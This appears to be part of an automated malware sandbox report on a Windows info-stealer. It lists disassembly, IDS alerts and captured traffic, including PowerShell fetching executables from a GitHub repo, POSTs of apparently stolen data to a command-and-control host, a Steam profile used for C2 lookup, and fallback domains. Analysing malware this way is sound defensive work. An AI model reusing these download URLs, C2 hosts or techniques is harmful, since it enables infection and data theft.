Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then lea ecx, dword ptr [eax-40000000h]	16_2_00382AF8
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then lea edx, dword ptr [ecx+ecx]	16_2_00382AF8
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+44h]	16_2_003B4300
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h]	16_2_003BD300
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov word ptr [ecx], bx	16_2_003BD300
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	16_2_003BC3A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	16_2_003BC3A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov ebp, ebx	16_2_003BC3A0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, di	16_2_0039FE40
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h]	16_2_0039FE40
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	16_2_003BD7F0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	16_2_00372800
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [003C1018h]	16_2_0037F066
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov word ptr [edi], cx	16_2_00399840
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_00380897
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	16_2_00380897
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h	16_2_003B80C0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h]	16_2_0039D92B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	16_2_003BD950
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	16_2_003719E0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	16_2_003B8220
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then jmp eax	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+70h]	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h]	16_2_0038E21B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov byte ptr [ecx], dl	16_2_00393A70
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov byte ptr [edi], cl	16_2_00393A70
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h]	16_2_003B5250
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h]	16_2_003B5250
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h]	16_2_003B82E0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	16_2_003992C0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+34h]	16_2_003A3330
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	16_2_0037A320
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	16_2_0037A320
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]	16_2_0038C833
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch]	16_2_0039F430
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov word ptr [eax], cx	16_2_00380C1B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	16_2_00380C1B
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov byte ptr [ecx], dl	16_2_00381C5F
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h]	16_2_00398CB0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h]	16_2_003A05B2
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh]	16_2_00390D90
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	16_2_003B8590
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov byte ptr [eax], cl	16_2_0038EDDC
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h]	16_2_0037CE30
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+esi]	16_2_0037CE30
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	16_2_0038AE40
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	16_2_003936EB
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h]	16_2_0037C710
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	16_2_0038AF00
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah]	16_2_0038AF00
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	16_2_003A3FB0
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then mov byte ptr [eax], cl	16_2_0038EFAD
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]	16_2_0037EFAE
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]	16_2_00382FDB
Source: C:\Users\user\AppData\Local\dll.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah]	16_2_003BC7D0

Networking

Contains functionality to determine the online IP of the system

Source: C:\Users\user\AppData\Local\Service.exe

Code function: 22_2_00007FF621BF20B0 InternetOpenA,GetLastError,InternetOpenUrlA,GetLastError,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn, http://api.ipify.org

22_2_00007FF621BF20B0

Source: global traffic

TCP traffic: 192.168.2.5:57846 -> 89.208.104.175:5000

Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 23.197.127.21 23.197.127.21

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57833 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57835 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57837 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57842 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57849 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57852 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57839 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57858 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57848 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57861 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57856 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57854 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57862 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57863 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57857 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57855 -> 23.197.127.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57864 -> 104.73.234.102:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57836 -> 185.199.110.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57831 -> 140.82.121.4:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57832 -> 185.199.110.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57834 -> 140.82.121.4:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.110.133:443 -> 192.168.2.5:57836
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.110.133:443 -> 192.168.2.5:57832
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57841 -> 185.199.110.133:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57838 -> 140.82.121.4:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.110.133:443 -> 192.168.2.5:57841

Source: unknown	DNS traffic detected: query: weaponrywo.digital replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: crosshairc.life replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: htardwarehu.icu replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kbracketba.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bugildbett.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: latchclan.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: legenassedk.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jowinjoinery.icu replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mrodularmall.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: cjlaspcorne.icu replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: featureccus.shop replaycode: Name error (3)

Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: pupmeholk.bet
Source: global traffic	HTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4wme9ISH8hj9NnyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14898Host: pupmeholk.bet
Source: global traffic	HTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KOtRjcMSGf7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15032Host: pupmeholk.bet
Source: global traffic	HTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=sh8djImo60hJUFxsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20541Host: pupmeholk.bet
Source: global traffic	HTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9MngIyc7tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2381Host: pupmeholk.bet

Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.104.175
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Service.exe

22_2_00007FF621BF20B0

Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: IPRetrieverHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: IPRetrieverHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: IPRetrieverHost: api.ipify.orgCache-Control: no-cache

Source: dll.exe, 00000010.00000002.1613159875.0000000004100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=1125b621d2e11a076d0cef20; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:31 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlR]]$Sn equals www.youtube.com (Youtube)
Source: jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; 